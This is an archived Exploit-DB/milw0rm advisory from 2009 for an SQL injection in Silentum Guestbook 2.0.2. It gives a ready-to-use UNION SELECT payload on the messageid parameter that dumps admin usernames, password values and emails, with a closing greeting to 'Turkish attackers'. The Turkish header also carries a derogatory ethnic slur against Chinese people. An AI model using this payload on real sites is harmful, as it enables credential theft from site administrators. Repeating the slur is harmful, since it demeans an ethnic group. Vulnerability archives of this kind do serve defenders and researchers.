Silentum Guestbook 2.0.2 - 'silentum_Guestbook.php' SQL Injection

EDB-ID:

9202


Author:

Bgh7

Type:

webapps


Platform:

PHP

Date:

2009-07-20


##Silentum Guestbook v2.0.2 (silentum_guestbook.php) Sql Injection Vuln.
#######################################################################
#######################################################################
##Yazar: Bgh7
##
##Turk Bilisim Gucleri Group / Ihlilal Hatti
##
##ByBgh7[a]msn.com
##
##Http://Bgh7.Blogspot.Com
##
##Bug: Sql Injection
##
##Ä°ndir/Download: http://hypersilence.net/silentum_guestbook.php
##
##Biz ki neler gördük, biz ki neler çektik... 2-3 Çekik gözlüden mi korkacağız ?
##Çin sömürecek bir rezerv daha bulduğunu sanıyor, yazık...
#######################################################################
#######################################################################
Sql: silentum_guestbook.php?messageid=-1 UNION ALL SELECT 0,0,0,0,concat(u_name,0x3a,u_password,0x3a,u_email),0,0 FROM silentum_admin/**
#######################################################################
#######################################################################
Thanks: m3rcil3sS & GhostKing & milw0rm & All Turkısh Attackers

# milw0rm.com [2009-07-20]